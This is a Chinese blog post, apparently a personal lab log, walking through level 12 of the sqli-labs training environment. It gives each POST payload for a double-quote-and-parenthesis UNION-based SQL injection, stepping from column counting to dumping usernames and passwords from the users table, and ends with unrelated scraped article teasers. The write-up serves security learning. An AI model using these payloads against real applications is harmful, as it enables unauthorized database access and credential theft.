sqli-labs关卡记录12

ops/2024/12/26 19:30:10/

和11关一样,本关卡依旧是post型,判断方式这里不再描述,接着就是判断是数字型还是字符型,很明显是字符型,因为输入1,和1dhqihioq得到的都是一样的,然后就是判断闭合方式,这里先试了试单引号,发现没有反应,于是改换双引号

找到闭合方式为"),于是下面就是和之前一样,进行逐步验证。

获取列数:

命令为:uname=1")order by 2--+&passwd=1&submit=Submit

找到显示位:uname=1")union select 1,2--+&passwd=1&submit=Submit

查找数据库名:uname=1")union select database(),2--+&passwd=1&submit=Submit

查找该数据库下存在的表:uname=1")union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2--+&passwd=1&submit=Submit

查找到users表下对应的列名:uname=1")union select (select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),2--+&passwd=1&submit=Submit

拿到相关的信息:uname=1")union select (select group_concat(username,password) from users),2--+&passwd=1&submit=Submit


http://www.ppmy.cn/ops/145192.html

相关文章

STM32和精准的型号STM32F03C8T6 ——ADC通道数目区别

注意表达方式的区别 5.STM32芯片内部集成的(12)位ADC是一种逐次逼近型模拟数字转换器,具 有(18)个通道,可测量(16)个外部和(2)个内部信号源。 书上原话:STM32…

GitLab的卸载与重装

目录 一、GitLab的卸载 二、 GitLab的安装与配置 1. 创建安装目录 2. 安装 3. 使用 3.1 初始化 3.2 创建空白项目 ​编辑 3.3 配置SSH 3.3.1 配置公钥 ​编辑 3.3.2 配置私钥 3.4 配置本地git库 一、GitLab的卸载 1. 停止gitlab sudo gitlab-ctl stop 2. 卸载…

【NIFI】实现HANA->ORACLE数据同步

【NIFI】实现HANA->ORACLE数据同步 需求 实现 HANA->ORACLE数据同步 HANA表名(视图):"_SYS_BIC"."ZUNIS/CAL_ZFI019_DETAIL"ORACLE表明:CAL_ZFI019_DETAIL 配置如下 1、QueryDatabaseTable&#xff1a…

算法学习(17)—— FloodFill算法

目录 关于FloodFill算法 部分OJ题详解 733. 图像渲染 200. 岛屿数量 695. 岛屿的最大面积 130. 被围绕的区域 417. 太平洋大西洋水流问题 529. 扫雷问题 LCR130. 衣橱整理 关于FloodFill算法 爆搜,深搜,回溯的算法原理并不难,这类题…

vue调试工具 Vue.jsDevtools

文件下载 Vue.js Devtools 通过网盘分享的文件:ddebf336f8a44293bd4db9d0f287bc1c.crx 链接: https://pan.baidu.com/s/1uS3a49CwW-B000p5GwUQmQ 提取码: ko89 下载完了 ,拖入chrome里,打开详情配置. 打开红框中的开关 重启浏览器&#xff…

React Native 集成 iOS 原生功能

React Native 集成 iOS 原生功能完整指南 前言 在 React Native 项目中集成 iOS 原生功能是一个常见需求。本文将同样以打印机功能为例,详细介绍如何在 React Native 项目中集成 iOS 原生功能。 集成步骤概述 创建原生模块(Native Module&#xff09…

【Redis经典面试题六】Redis的持久化机制是怎样的?

目录 一、Redis的持久化机制 1.1 RDB 1.2 AOF 1.3 比较 1.4 混合持久化 二、RDB 和 AOF 的写回策略分别是什么? 2.1 RDB的写回策略 定期触发 手动触发 2.2 AOF 的写回策略 三、Redis能完全保证数据不丢失吗? 一、Redis的持久化机制 Redis提供…

Kubernetes(k8s)离线部署DolphinScheduler3.2.2

1.环境准备 1.1 集群规划 本次安装环境为:3台k8s现有的postgreSql数据库zookeeper服务 1.2 下载及介绍 DolphinScheduler-3.2.2官网:https://dolphinscheduler.apache.org/zh-cn/docs/3.2.2 官网安装文档:https://dolphinscheduler.apach…